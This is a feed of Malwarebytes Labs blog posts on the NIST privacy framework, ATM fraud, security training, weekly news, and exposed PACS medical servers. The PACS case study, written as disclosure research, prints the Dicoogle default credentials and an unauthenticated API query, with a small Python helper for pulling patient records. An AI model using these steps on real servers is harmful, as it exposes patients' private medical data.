NIST’s privacy framework lets privacy tell its own story

Malwarebytes - Wed, 05/29/2019 - 18:51

Online privacy remains unsolved. Congress prods at it, some companies fumble with it (while a small handful excel), and the public demands it. But one government agency is trying to bring everyone together to fix it.

As the Senate sits on no fewer than four data privacy bills that its own members wrote—with no plans to vote on any—and as the world’s largest social media company braces for an anticipated multibillion-dollar fine for its privacy blunders, the US National Institute of Standards and Technology (NIST) has published what it calls a “privacy framework” draft.

Non-binding, unenforceable, and entirely voluntary to adopt, the NIST privacy framework draft serves mainly as a roadmap. Any and all companies, organizations, startups, and agencies can look to it for advice in managing the privacy risks of their users.

The framework draft offers dozens of actions that a company can take on to investigate, mitigate, and communicate its privacy risks, both to users and executives within the company. Nearly no operational stone is left unturned.

Have a series of third-party vendors in a large supply chain? The NIST framework has a couple of ideas on how to secure that. What about countless employees with just as many logins and passwords? The framework considers that, too. Ever pondered the enormous meaning of “data security” for your company? The NIST framework has a couple of entry points for how to protect data at rest and in transit.

Though couched in government-speak and at-times-indecipherable nomenclature (suggested company actions are called “subcategories”), the 37-page privacy framework, according to one of its authors, has a simple, elegant purpose: It could finally let privacy tell its own story.

“To date, security [professionals] are telling a dramatic story. ‘We had these threats. Look what happened to these companies here,’” said NIST Senior Privacy Policy Advisor Naomi Lefkovitz. “But privacy [professionals] are over here saying ‘Privacy is a very important value,’ which is true, but it’s not quite as compelling when resources are being allocated.”

Lefkovitz continued: “We want privacy to be able to tell an equally compelling story.”

If successful, the NIST privacy framework could improve user privacy within organizations across the United States. It could better equip privacy officers to convince their companies to bulk up internal controls. And it could create an agreed-upon direction for privacy.

There are, of course, obstacles. A voluntary framework is only as successful as it is attractive—overly ambitious guidelines could turn the framework into a dud, tossed aside by the companies that handle the most user data.

Also, the framework should work in coordination with current data protection laws, rather than trying to overwrite those laws’ requirements. For example, as companies have built up their internal controls to comply with the European Union’s sweeping data protection law, the General Data Protection Regulation, a new approach to privacy could be seen as time-consuming, costly, and unnecessary.

Despite the potential roadblocks, NIST has been here before. Six years ago, the government agency was tasked with making a separate framework—one for cybersecurity.

The NIST cybersecurity framework

In 2013, through Executive Order 13636, President Barack Obama asked NIST to develop a strategy on securing the nation’s critical infrastructure from cyberattacks. This strategy, or framework, would include “standards, methodologies, procedures, and processes that align policy, business, and technological approaches to address cyber risks.” It would be voluntary, flexible, repeatable, and cost-effective for organizations to take on.

On February 12, 2014, NIST published the first version of its cybersecurity framework. The framework’s so-called “core” includes five functions that a company can take on to manage cybersecurity risks. Those functions are:

  • Identify
  • Protect
  • Detect
  • Respond
  • Recover

Each function includes “categories” and “subcategories,” the latter of which are actually outcomes that a company can try to achieve. It may sound confusing, but the framework simply organizes potential cybersecurity goals based on their purpose, whether that means identifying cybersecurity risks, protecting against those risks, detecting problems when they arise, or responding and recovering from them later on.

Several years, multiple workshops, more than 120 submitted comments, and one major update later, the framework has proved largely popular.

According to annual surveys of cybersecurity professionals by the Information Systems Security Association and Enterprise Strategy Group, the NIST cybersecurity framework has taken hold. In 2018, 46 percent of the survey’s 267 respondents said that they had “adopted some portions or all of the NIST cybersecurity framework” in the past two years. That same response showed up as a top five cybersecurity measure in 2017 and 2016.

In April 2018, when NIST released the cybersecurity framework’s Version 1.1 update, the US Chamber of Commerce, the Business Roundtable, and the Information Technology Industry Council all spoke in favor, with the Chamber of Commerce calling the framework “a pillar for managing enterprise cyber risks and threats.”

For NIST, the challenge will be translating these successes to privacy.

“Privacy is, if anything, more contextual than security, and therefore, it makes it very difficult to make one-size-fits-all rules and expect to get effective privacy solutions,” said Lefkovitz. “You can certainly get a checklist of solutions, but that doesn’t mean you’re providing any privacy benefits.”

The NIST privacy framework

The NIST privacy framework draft, published last month after a 48-day open comment period, is modeled closely on NIST’s cybersecurity framework. The privacy framework, just like the cybersecurity framework, has a core that includes five functions, each with its own categories and subcategories, the latter of which, again, actually describe outcomes. The privacy framework’s five core functions are:

  • Identify
  • Protect
  • Control
  • Inform
  • Respond

Again, companies can voluntarily use the framework as a tool, choosing the areas of privacy risk management where they need support.

For example, a company that wants to identify the privacy risks to its users can explore its inventory and mapping processes, supply chain risk management, and governance, which covers a company’s policies and regulatory and legal requirements. A company that wants to protect against privacy risks can look at achieving a number of options, including ensuring that both remote access and physical access to data and devices are managed. Companies could also, for example, make sure that data is destroyed according to company policy.

The privacy framework has been well received, but there are improvements to be made.

“I think the draft is good as a starting point,” said Amie Stepanovich, US policy manager for Access Now, a digital rights and free expression advocacy group that submitted comments to NIST about the privacy framework. “It is a draft, though.”

Stepanovich said she liked that the privacy framework draft will be revisited in the future, and that it does not try to present a “one-size-fits-all” solution to privacy. She also said that she hopes the privacy framework can dovetail with current data protection laws, and not serve as a replacement to much-needed data privacy legislation.

Stepanovich added that the privacy framework’s focus on the user represents a potentially enormous shift for privacy risk management for many companies. Currently, Stepanovich said, privacy risk operates on three levers—legal liability risks, public relations risks, and future regulatory risks. Basically, companies calculate their privacy risk based on whether they’ll face a lawsuit, look bad in the newspaper, or look so bad in front of Congress that an entirely new law is crafted to rein them in.

The focus on the user, Stepanovich said, could meaningfully communicate to the public that their data is being protected in an all new way.

“The trust that people can have in companies—or data processors—will not come from legal compliance, because nobody says ‘Trust me, I do exactly what I have to do to not be sued,’” Stepanovich said. “If [data processors] are going beyond what needs to be done to serve interests of people who may be put at risk through their behavior, that starts to look like something people will pay attention to.”

But going above and beyond the current legal compliance landscape could actually be a roadblock for some companies.

When NIST opened its email box up for public comments, one major lobbying group suggested a list of “minimum attributes” to be included. The Internet Association, which represents the public policy interests of Google, Facebook, Uber, Airbnb, Amazon, and Twitter, just to name a few, asked that the framework have “compatibility with other privacy approaches.”

For many of the group’s represented companies, legal compliance is part of their privacy approach, and NIST’s privacy framework draft proposes a few outcomes that do not entirely line up with current legal requirements in the US.

For example, the privacy framework suggests that companies could structure their data management to “protect individuals’ privacy and increase manageability.” Some of the ways to do that, the privacy framework suggests, are by giving users the control to access, alter, and delete the data stored about them.

But a company that adheres to those suggestions could potentially face questions about how to fulfill certain government requests in which US intelligence agencies demand a user’s online messages or activity as part of an investigation.

Another “minimum attribute” proposed by the Internet Association is also missing from the draft: “Common and Accessible Language.”

A similar matter proved a pain point for Stepanovich, who is not associated with the Internet Association.

“This is not a draft document that people can easily understand,” Stepanovich said. She compared the privacy framework draft to, somewhat surprisingly, the hit ABC drama “Lost,” a circuitous six-season television show that included a disappearing island, time travel, and storytelling techniques such as flashbacks, flash-forwards and, remarkably, what can only be described as “flash-sideways” moments into a parallel, maybe-Heaven dimension.

“This is the ‘Lost’ problem,” Stepanovich said. “’Lost’ lost viewers every season because you couldn’t start watching it in season three and have any clue—it required watching every episode, and it kept getting more complicated, providing no entry point.”

TV analogies aside, Stepanovich’s bigger point is this: With no entry point for non-techies, the individuals who could be most impacted by this privacy framework will miss out on the opportunity to shape it.

“It shouldn’t just be cybersecurity, those who focus on tech, because tech is not necessarily the most at-risk community here. LGBT [individuals], civil rights [defenders], immigrants—populations who have a higher stake in the privacy conversation,” Stepanovich said. “If it is too difficult for us to understand, it is impossible for those groups to get in there and have the resources to devote to this issue. They need to be there.”

Beyond the draft

NIST’s privacy framework draft is just that, a draft. The agency scheduled a webinar for May 28 and a public workshop in Boise, Idaho, on July 8 and 9. Registration is free. A preliminary draft is expected in the summer, with Version 1.0 to be published in October.

Until then, everyone is invited to share their thoughts with NIST about what they expect to see from the privacy framework. We at Malwarebytes know you care about privacy—you’ve told us before. Feel free to tell your story about privacy. It could help shape the topic’s future.

The post NIST’s privacy framework lets privacy tell its own story appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Everything you need to know about ATM attacks and fraud: Part 1

Malwarebytes - Wed, 05/29/2019 - 15:00

Flashback to two years ago. At exactly 12:33 a.m., a solitary ATM somewhere in Taichung City, Taiwan, spewed out 90,000 TWD (New Taiwan Dollar)—about US$2,900 today—in bank notes.

No one was cashing out money from the ATM at the time. In fact, this seemingly odd system glitch was actually a test: The culprit who successfully infiltrated one of First Commercial Bank’s London branch servers issued an instruction to a cashpoint 7,000 miles away to check if a remote-controlled heist was possible.

Within 15 hours, 41 more ATMs at other branches in Taichung and Taipei cities doled out an accumulated 83.27 million TWD, which is worth US$2.7 million today.

And while the Taiwan police successfully nabbed the suspects of this million-dollar heist—most of whom hailed from European countries—many unnamed criminals who take advantage of flaws and weaknesses in ATMs (and in financial systems as a whole) are still at large.

Normal ATM users cannot fight against such an attack on their banks. But with vigilance, they can help bring criminals to justice. The catalyst for the arrests was intel provided by citizens who noticed the foreign nationals acting suspiciously, gathered relevant information—in this case, a car license plate number and a credit card one of the suspects accidentally left behind—and reported it to law enforcement.

Why ATMs are vulnerable

Just like any computing device, ATMs have vulnerabilities. One way to understand why bad guys are drawn to them is to understand their components and the way they communicate with the bank network.

An ATM is composed of a computer (and its peripherals) and a safe. The former is enclosed in a cabinet. This is the same whether the ATM is a stand-alone kiosk or a “hole in the wall.” The cabinet itself isn’t particularly secure or sturdy, which is why criminals can use simple tools and keys purchasable online to break into it and gain access to either the computer or the safe.

The computer usually runs on Windows—a version specifically created for ATMs. ATM users don’t see the familiar Windows desktop interface because access is restricted. What we do see are user-facing applications that aid us in making transactions with the machine.

A rough list of attacks on ATMs (Source: Positive Technologies)

Even now, many ATMs are still running Windows XP. And if the OS is outdated, the software running on it likely needs upgrading as well. That means criminals can take their pick of which exploits to use against software vulnerabilities and take control of the remote system.

In some cases, a publicly visible interface such as a USB port invites ill-intentioned users to introduce malware to the machine via a portable device. Since security software may not be installed on ATMs, and authentication between peripherals and the OS is often absent, the likelihood of infection increases. To date, at least 20 strains of ATM malware have been discovered.

The cash dispenser is directly attached to the safe where the cash is stored. A compromised computer can easily give criminals access to the interface between the computer and the safe to command it to dispense cash without using stolen customer card information.

The traffic between the ATM computer and the transaction processing server is usually not encrypted, making it easy for hackers to intercept data transmitted between customer and bank server. Worse, ATMs are notorious for poor firewall protection, which makes them susceptible to network attacks.

Other notable weaknesses are missing or misconfigured Application Control software, lack of hard drive encryption, and little-to-no protection against users accessing the Windows interface and introducing other hardware devices to the ATM.
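One of the weaknesses above, the unencrypted link between the ATM computer and the processing server, has a standard remedy: transport encryption. The sketch below is generic and illustrative, not ATM-specific (the host name and port are placeholders), showing how a client connection can be wrapped in certificate-verified TLS using Python's standard library:

```python
import socket
import ssl

# Build a TLS context with certificate verification enabled (the default for
# create_default_context). A link configured this way denies a passive
# interceptor the plaintext transaction data described above.
context = ssl.create_default_context()

def open_encrypted_channel(host: str, port: int) -> ssl.SSLSocket:
    """Open a TCP connection and wrap it in TLS, verifying the server cert."""
    raw = socket.create_connection((host, port), timeout=10)
    return context.wrap_socket(raw, server_hostname=host)

# Example call (placeholder host):
# sock = open_encrypted_channel("processing.example.com", 443)
```

With verification on, a man-in-the-middle on the ATM's network segment sees only ciphertext and cannot impersonate the processing server without a valid certificate.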

Types of ATM attacks and scams

Hacking a bank’s server is only one of the many known ways criminals can get their hands on account holders’ card details and their hard-earned cash. Some methods are clever and tactical. Some can be crude. And others are more destructive and dangerous. Whatever the method, we can bet that criminals will do whatever it takes to pull off a successful heist.

We have highlighted types of ATM attacks here based on their classification: terminal tampering, physical attacks, logical attacks, and social engineering.

For this post, we’ll be delving deep into the first two; the latter two will be featured in Part 2 of this series.

Terminal tampering

The majority of ATM fraud campaigns involve a level of physically manipulating parts of the machine or introducing devices to it to make the scheme work.

Skimming. This is a type of fraud where a skimming device, usually a tandem of a card reader (skimmer) and a keypad overlay or pinhole camera, is introduced to the machine by placing it over the card slot and keypad, respectively. The more closely these devices resemble the machine’s own parts, the better they work and the less likely they are to draw suspicion.

The purpose of the second card reader is to copy data from the card’s magnetic stripe, while the keypad overlay or camera captures the PIN, so the criminal can make forgeries of the card.

ATM skimmer devices (Source: The Hacker News)

Of course, there are many ways to capture card and PIN data surreptitiously. They all fall under this scheme. Examples include skimming devices that tap into the ATM’s network cables, which can intercept data in transit.

Criminals can up the ante of their skimming campaign by purchasing a second-hand ATM (at a bargain price) and then rigging it to record data. These rigged machines do not dispense cash. This is by far the most convincing method, because wary account holders wouldn’t think that an entire ATM is fake. Unfortunately, no amount of card slot jiggling can save their card details from this.

Skimming devices can also be slotted at point-of-sale (POS) terminals in shops or inside gas pumps. Some skimmers are small enough to be concealed in one’s hand so that, if someone with ill intent is handed a payment card, they can quickly swipe it with their skimmer after swiping it at a POS terminal. This is a video of a former McDonald’s employee manning the drive-thru window caught doing just that.

Shimming. One may refer to shimming as an upgraded form of skimming. While it still targets cards, its focus is recording or stealing sensitive data from their embedded chips.

A paper-thin shimming device is inserted into the ATM’s card slot, where it sits between the card and the ATM’s chip reader. This way, the shimmer records data from the card chip while the machine’s chip reader is reading it. Unlike earlier skimming devices, shimmers can be virtually invisible if inserted perfectly, making them difficult to detect. However, one sign that an ATM could have a shimming device installed is a tight fit when you insert your bank card.

Data stolen from chip cards (also known as EMV cards) can be converted to magnetic stripe data, which in turn can be used to create counterfeit versions of traditional magnetic stripe cards.

You may recall that issuers once said EMV cards offer better protection against fraud than traditional bank cards.

With more users and merchants now favoring chip cards, either due to convenience or industry compliance, it was expected that criminals would eventually find a way to circumvent the chip’s security and read data from it. Regrettably, they didn’t disappoint.

Card trapping. Although not as broadly reported as other ATM attack schemes, card trapping is alive and, unfortunately, kicking. Of late, it has victimized a 17-year-old who lost her life savings, as well as a friend of a former detective from Dundee, Scotland.

Card trapping is a method wherein criminals physically capture their target’s debit or credit card via an ATM. They do this by introducing a device, usually a Lebanese loop, that prevents the card from getting ejected once a transaction is completed. Criminals steal their target’s PIN by shoulder surfing or by using a small hidden camera similar to those used in skimming.

A card trap (Source: Police Service of Northern Ireland)

Another known card trap is called a spring trap.

Cash trapping. This is like card trapping, only criminals are after the cash their target just withdrew. A tool—either a claw-like implement, a large fork-like device that keeps the cash slot open after a withdrawal, or a “glue trap”—is introduced to the ATM cash slot to trap some or all of the cash.

Cash trapping that doesn’t involve pincer implements normally uses what is called a false ATM presenter. This is a fake cash dispenser placed in front of the real one.

A false ATM presenter used to capture cash (Source: ENISA)

Physical attacks

If wit isn’t enough to pull off a successful ATM heist, brute force might be. As rough, unsophisticated, and sloppy as these methods look, criminals have achieved some success going this route.

Crooks who’d rather be loud than quiet have opted for explosives (both solid and gas), lassoing the machine with a chain so it can be uprooted and dragged away, ram-raiding, and using a digger to pull a wall-mounted ATM out of a building. Sledgehammers, crowbars, and hammers have worked wonders, too.

This ATM theft took less than four minutes (Source: The Guardian)

For the fourth consecutive year, overall physical attacks on ATMs in Europe increased, according to the European Association for Secure Transactions (EAST). From 2017 to 2018, there was a 16 percent increase in total losses (from US$34.6 million to US$40.2 million) and a 27 percent increase in reported incidents (from 3,584 to 4,549). The bulk of losses was due to explosive or gas attacks, followed by robbery and ram-raiding.
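The percentage figures quoted from the EAST report can be sanity-checked with a few lines of arithmetic:

```python
# Check the percent increases against the underlying figures quoted above.
# Numbers come directly from the text; rounding to whole percentages matches
# how the report states them.

def pct_increase(old: float, new: float) -> int:
    """Percentage increase from old to new, rounded to the nearest whole percent."""
    return round((new - old) / old * 100)

losses = pct_increase(34.6, 40.2)     # total losses, in US$ millions -> 16
incidents = pct_increase(3584, 4549)  # reported incidents -> 27
print(losses, incidents)
```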

“The success rate for solid explosive attacks is of particular concern,” said EAST Executive Director Lachlan Gunn in the report. “Such attacks continue to spread geographically with two countries reporting them for the first time in early 2019.”

The ATM Security Working Group (ATMSWG) published a document on best practices against ATM physical attacks [PDF] that financial institutions, banks, and ATM merchants can refer to and use in their planning to beef up the physical security of their machines. Similarly, the ATM Industry Association (ATMIA) has a handy guide on how to prevent ATM gas and explosive attacks [PDF].

Know when you’re dealing with a tampered ATM

Financial institutions and ATM providers know that they have a long way to go to fully address fraud and theft, and they have been finding and applying ways to step up their security measures. Of course, ATM users shouldn’t let their guard down, either.

Minimize the likelihood of facing a tampered ATM—or other dangers lurking about—by reading through and following these tips:

Before visiting an ATM
  • Pick an ATM that appears safe to use. It’s well lit, passers-by can see it, and it has a CCTV camera pointed at it. Ideally, go for an indoor ATM, which can be found in bank branches, shopping malls, restaurants, convenience shops, and others. Avoid machines that have been neglected or vandalized.
  • If you find yourself in an area you’re not familiar with, try going for ATMs that meet most of the physical requirements we mentioned.
  • Avoid visiting ATMs alone, especially outside of normal banking hours. A friend or relative can help if the transaction goes awry, and their mere presence can deter muggers and other strangers.
  • Check over the ATM. Look for devices that may be sticking out from behind it or from any of its peripherals. Look for false fronts (over the card and money slots, the keypad, or, worse, the entire face of the machine), tiny holes where cameras could be watching, cracks, mismatched key colors, etc. Report any of these signs to the bank, then look for another ATM.
  • Lastly, watch for anyone loitering in your vicinity or acting suspiciously. Do not confront them. Instead, if their behavior is disturbing enough, report them to the police.
While using the ATM
  • Put away anything that will distract you while you use the ATM. Yes, we mean your phone and your Nintendo Switch. These can pull your attention away from your surroundings, which criminals can use to their advantage.
  • Tug on the card reader and cash dispenser to make sure there are no extra devices attached.
  • It pays to cover the keypad when entering your PIN, whether you’re alone in the queue or not. You may have checked the ATM for signs of physical tampering, but it’s always possible to miss things. Also, if the person next in the queue is too close, either remind them to move further back or cover the PIN pad as much as you can.
  • Always print a copy of your ATM receipt and put it away for safety. This way, you have something to refer to and compare against your bank statement.
After withdrawing from an ATM
  • Put your card, cash, and receipt away quickly and discreetly.
  • If the ATM didn’t return your card, stay beside the machine and call your bank’s 24/7 support number to cancel the card, so that if criminals retrieve it, it won’t work. Tell those behind you in the queue that your card is stuck and that they won’t be able to use the machine until it’s removed.
  • If the ATM didn’t dispense any money, record the exact date, time, and ATM location, and call the bank’s 24/7 support number. Snap a few pictures with your phone, too, and send copies to yourself (via SMS or email) so you have a digital record.
  • Also call your card issuer or bank to file a claim, explaining that the ATM you used didn’t dispense the cash. Filing a claim is a lot easier and faster if you used your own bank’s ATM inside a branch.
  • If this happened at a convenience store, alert an employee at once. They may have a process to move things along. They can also stop other store shoppers from using the problematic machine.
  • Regularly review your bank statement for withdrawals and/or card use that you didn’t make yourself. Report the fraud to your bank if you spot any.
Considering other payment options

One doesn’t always have to keep withdrawing money from the ATM. If there are ways consumers can pay for goods without using cash from an ATM, they should at least consider these options.

Many are claiming that using the contactless or tap-and-pay feature of your card or smartphone is an effective way to combat account (and ATM) fraud entirely.

For Part 2 of this series, we’ll be looking at logical and social engineering attacks criminals use against ATMs and their users. Until then, be on the lookout and stay safe!

The post Everything you need to know about ATM attacks and fraud: Part 1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Employee education strategies that work to change behavior

Malwarebytes - Tue, 05/28/2019 - 15:25

When people make the decision to get in shape, they have to commit the time and energy to do so. Going to the gym once isn’t going to cut it. The same is true when it comes to changing the culture of an organization. In order to be effective in changing employee behavior, training needs to be on-going and relevant.

Technology is rapidly evolving. Increasingly, new solutions are able to better defend the enterprise against malicious actors from the inside and out, but tools alone cannot protect against cyberattacks.

Verizon’s 2019 Data Breach Investigations Report (DBIR) found that:

While hacking and malicious code may be the words that resonate most with people when the term “data breach” is used, there are other threat action categories that have been around much longer and are still ubiquitous. Social engineering, along with misuse, error, and physical, do not rely on the existence of cyberstuff.

In short, people matter. Employee education matters.

Taking a technological approach to securing the enterprise has started to unravel over the last decade, according to Lance Spitzner, director, research and community at SANS Institute. “The challenge we are facing is that we have always perceived cybersecurity as a technical problem. Bad guys are using technology to attack technology, so let’s focus on using technology to secure technology,” Spitzner said.

Increasingly, organizations have come to understand that we have to address the human problem also. The findings from this year’s DBIR are evidence that human behavior is a problem for enterprise security. According to the report:

  • 33 percent of data breaches included social attacks
  • 21 percent resulted from errors as causal events
  • 15 percent of breaches were caused because of misuse by authorized users
  • 32 percent of breaches involved phishing
  • 29 percent of breaches involved the use of stolen credentials
Calling all stakeholders

Some organizations are still implementing the antiquated annual computer-based training and wondering why their security awareness program isn’t working. Despite the security team’s understanding that they must do more, creating an effective employee education program takes buy-in from a variety of stakeholders, said Perry Carpenter, chief evangelist and strategy officer of KnowBe4 and author of Transformational Security Awareness: What Neuroscientists, Storytellers, and Marketers Can Teach Us About Driving Secure Behaviors.

“If they are stuck in the once a year, they have to find a way to justify moving past that, so there is some selling they have to do to their executive team in order to get support for more frequent communications and more budget. It’s essentially the higher touch that they have to sell,” Carpenter said.

Even those organizations that don’t have the budget to use an outside vendor can find ways to create compelling content, which means that security teams are tasked with the burden of having to justify the need for more employee engagement.

One way to sell that need, according to Carpenter, is to leverage the psychological effect known as the decay of knowledge. “We go to something and two days later, we forget most of the content. The further away we get from it, the more irrelevant, disconnected, and invisible it becomes.”

Evidence shows that a greater frequency of security education is the first step toward creating a more engaging awareness program. “In all things that you do, you are either building strength or allowing atrophy,” Carpenter said.
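The "decay of knowledge" Carpenter describes is often modeled with an exponential forgetting curve in the style of Ebbinghaus. The sketch below is purely illustrative; the retention constant is an assumed value, not a figure from the article or from research data, but it shows why quarterly refreshers leave more residual knowledge than a single annual session:

```python
import math

def retention(days_since_training: float, strength: float = 20.0) -> float:
    """Ebbinghaus-style forgetting curve: fraction of material retained after
    a given number of days. `strength` is an assumed memory-stability
    constant, chosen only for illustration."""
    return math.exp(-days_since_training / strength)

# Retention just before the next session, annual vs. quarterly cadence.
annual = retention(365)
quarterly = retention(91)
print(f"annual: {annual:.6f}, quarterly: {quarterly:.6f}")
```

Whatever constant you pick, the curve makes the same qualitative point: retention collapses toward zero over a year, which is the argument for higher-frequency, higher-touch programs.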

Once you have the buy-in to be able to really grow the company’s security awareness program, you need to figure out how to connect with people. That’s why Carpenter is a fan of a marketing approach that uses several channels.

Given that some people learn best visually while others prefer in-person instruction, identifying which content forms are most engaging to different employees will inform the types of training needed for the program to succeed.

No more death by PowerPoint

The old computer-based training programs developed by auditors have done little to defend the enterprise against sophisticated phishing attacks. If you want people to care about security, you need to build a bridge between technology and people.

Sometimes, those who are highly technically skilled aren’t adept at communicating with people. “Traditionally, some of the biggest blockers to awareness programs were security people who believed if the content wasn’t technical that it wasn’t security,” Spitzner said.

Now, security professionals are starting to realize that employees respond differently to a variety of attack vectors, which is why Omer Taran, co-founder and CTO at CybeReady, said that collecting and analyzing performance data in real time is crucial to building a better awareness education program.

“Specially designed ‘treatment plans’ should include an adjusted frequency, timely reminders, custom simulations, and training content that helps to reform this particularly susceptible group,” Taran said.

Empowering employees

In order for companies to stay a step ahead of cybercriminals, their employee education programs need to be engaging. That’s why building a security-aware culture is one of the most important steps the organization can take.

“Processes and policies are fine, but if you’re not winning hearts and minds and gaining buy-in from employees, it’s probably a non-starter. The bad guys don’t care how well-written your policies are, or even if you have any,” said Lisa Plaggemier, chief evangelist at Infosec.

It’s also important not to play the blame game. Rather, Plaggemier said, “empower employees with awareness campaigns and good quality training, delivered through a program that influences behavior.”

To make cybercrime and fraud protection key parts of your company culture, Plaggemier recommended that leaders and managers consider these tips:

  • Be an example. Leaders have the ability to shift attitudes, beliefs, and ultimately, employee behavior. If leaders are taking security shortcuts that put the company at risk, employees will not believe the company is serious about doing everything it can to keep a secure workplace.
  • Be clear. Where confusion can create a culture of reactive rather than proactive behaviors, clarity helps prioritize the work. Make it clear that protecting the business is a top priority by creating written policies and having clear processes and procedures in place.
  • Be repetitive. Repetition is key for instilling good security habits in your employees. Human beings create new habits over time by repeating their actions. Encourage employees to turn out-of-the-ordinary tasks, such as calling a vendor to confirm it’s really them asking to change their “pay to” account, into routine ones.
  • Be positive. Fear, uncertainty, and doubt are not good motivators. Instead, use language that empowers your employees. Make people feel like they matter in the information you share with them so that they can be better, smarter, and more confident in their choices when faced with something potentially malicious.

The post Employee education strategies that work to change behavior appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 20 – 26)

Malwarebytes - Mon, 05/27/2019 - 07:03

Last week on Malwarebytes Labs, we took a look at a skimmer pretending to be a payment service provider, gave an overview of what riskware is, took a deep dive into concerns about PACS leaks, and dug around in the land of “These Governments said fix it…hurry up”.

Other cybersecurity news
  • Changes inbound for Microsoft network admins: If you’re managing Windows 10 updates, you’ll need to make some tweaks to System Center Configuration Manager (Source: Microsoft)
  • AI animates static images: First we had deepfakes; now we have the Mona Lisa’s eyes following you around the room in a more literal way than you may be accustomed to (Source: The Register)
  • Baltimore ransomware woes: An update on how Baltimore is coping two weeks after a devastating ransomware attack (Source: New York Times)
  • Huge title insurance leak: First American Financial Corp. find themselves in the middle of a story involving unsecured documents dating back to 2003 (Source: Krebs on Security)
  • Trouble for T-Mobile: The telecommunications giant ran into an issue that allowed people in the know to potentially view customer names and account numbers freely (Source: Daley Bee)
  • Security pros on the way out: Large numbers of pros have considered quitting the field due to a lack of resources (Source: Help Net Security)
  • Party political security: Security Scorecard take a look at how robust political parties’ security is prior to major elections (Source: Security Scorecard)
  • Canada, popular with phishers: Why is Canada a favourite for people launching fake mail campaigns? (Source: Tech Republic)
  • But is it art: Is this laptop containing some of the most notorious pieces of malware around worth one million dollars? (Source: BBC)
  • School’s out: TrickBot gives the kids an early recess as a school’s IT infrastructure can’t cope with the attack (Source: ZDNet)

Stay safe, everyone!

The post A week in security (May 20 – 26) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Medical industry struggles with PACS data leaks

Malwarebytes - Fri, 05/24/2019 - 18:05

In the medical world, sharing patient data between organizations and specialists has always been an issue. X-rays, notes, CT scans, and any other data or related files have always existed, and been shared, in their physical forms (slides, paperwork).

When a patient needed to take the results of a test to another practice for a second opinion, or to a specialist for a more detailed look, they had to get copies of the documents and physically deliver them to the receiving specialists. Even with the introduction of computers into the equation, this manual delivery remains common practice in some cases today.

In the medical field, data isn’t stored and accessed in the same way that it is in governments and private businesses. There is no central repository for a doctor to see the history of a patient, as there would be for a police officer accessing the criminal history of a given citizen or vehicle. Because of this, even with the digitization of records, sharing data has remained a problem.

The medical industry has stayed a decade behind the rest of the modern world when it comes to information sharing and technology. Doctors took some of their first steps into the tech world by digitizing images into a format called DICOM. But even with these digital formats, it still was, and sometimes still is, necessary for a patient to bring a CD with data to another specialist for analysis.

Keeping with the tradition of staying 10 years behind, only recently has this digital data been stored and shared in an accessible way. What we see today is individual practices hosting patient medical data on private, often in-house systems called PACS servers. These servers are exposed to the public Internet in order to allow other “trusted parties” to access the data instantly, rather than relying on the old manual sharing methods.

The problem is, while the medical industry finally joined the 21st century in info-TECH, it remains a decade behind in info-SEC, resulting in patients’ private data being exposed and ripe for the picking by hackers. This is the issue we’ll be exploring in this case study.

It’s in the setup

While there are hundreds of examples of exploitable medical devices/services that have been publicly exposed so far, I will focus in detail on one specific case involving a PACS server framework, a system with great prevalence in the industry. It deserves attention because it has the potential to expose private patient data if not set up correctly.

The servers I chose to analyze are built on a framework called Dicoogle. While the Dicoogle setup I discovered was insecure, the framework itself is not problematic. In fact, I have respect for the developers, who have done a great job creating a way for the medical world to share data. As with any technology, security often comes down to how the individual company decides to implement it. This case is no exception.

Technical details

Let’s start with discovery and access. Generally speaking, anything that exists on the Internet can be searched for and found. A server cannot hide; it is just an IP address, nothing more. So, using Shodan and some Google search terms, it was not difficult to find a live server running Dicoogle in the wild.

The problem begins when we look at its access control. The specific server I reviewed simply allowed open access to its front-end web panel; there were absolutely no IP or MAC address restrictions. There is a good argument that this database should not have been exposed to the Internet in the first place; rather, it should run on a local network accessible only by VPN. But since security was likely not considered in the setup, I didn’t have to do any of the more difficult targeted reconnaissance required for better-secured servers in hopes of finding the front page.

Now, we could give them the benefit of the doubt and say, “Maybe there are just so many people from all over the world legitimately needing access, so they purposely left it open but secured it in other ways.”

Once we look at the remaining OPSEC failures, we can strike this “benefit of the doubt” from our minds. I will note that I did come across implementations of Dicoogle that were not susceptible and remained intact; this confirms that in this case, we are indeed looking at an implementation error.

Moving on, just as a burglar trying to break into a house will not pull out his lock pick set before simply turning the door handle, we do not need to try any sophisticated hacks if the default credentials still exist in the system being audited.

Sadly, this was the case here. The server had the default creds, which are built into Dicoogle when first installed.

USERNAME: dicoogle
PASSWORD: dicoogle

This type of security fail is all too common throughout any industry.

However, our job is not yet done. I wanted to assess this setup in as many ways as possible to see if there were any other security fails. Default creds are too lame a bypass to stop there, and the problem is obviously easy enough to fix. So I began looking into Dicoogle’s developer documentation.

I realized that there are a number of API calls created for developers to build custom software that interacts with Dicoogle. These APIs are JavaScript, Python, or REST based. Although authentication modules are available for this server, they are not activated by default and require some setup. So even if this target had removed the default credentials, they could be easily circumvented, because all of the patient data can still be accessed via the API, without any authentication necessary.

This blood is not just on the hands of the team who set up the server; unfortunately, part of the blame also lies with Dicoogle. When you develop software, especially software that is almost guaranteed to contain sensitive data, security should be implemented by design and should not require the user to take additional actions. That being said, the majority of the blame belongs to the host of this service, as they are the ones handling clients’ sensitive data.

Getting into a bit of detail now, you can use any of the following calls, via a programming language or the REST API, to access this data and circumvent authentication.

[SERVER_IP]?query=StudyDate:[20141101 TO 20141103]
Using the results from this query, the attacker can obtain individual user IDs, then perform a follow-up call to pull all of the internal data and metadata from the DICOM image.

We can access all information contained within the databases using a combination of these API calls, again, without needing any authentication.
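The two-step pattern described above can be sketched in a few lines. This is a hedged illustration only: the `/search` and `/dump` endpoint names follow Dicoogle's developer documentation, the `uid` parameter name is an assumption, and the server address is a placeholder.

```python
from urllib.parse import quote

SERVER = "http://pacs.example.com:8080"  # hypothetical target, default Dicoogle web port

def search_url(field: str, start: str, end: str) -> str:
    """Build the unauthenticated free-text search call shown above,
    e.g. StudyDate:[20141101 TO 20141103]."""
    query = f"{field}:[{start} TO {end}]"
    return f"{SERVER}/search?query={quote(query)}"

def dump_url(uid: str) -> str:
    """Build the follow-up call that dumps all metadata for one DICOM object
    (parameter name 'uid' is an assumption)."""
    return f"{SERVER}/dump?uid={quote(uid)}"

print(search_url("StudyDate", "20141101", "20141103"))
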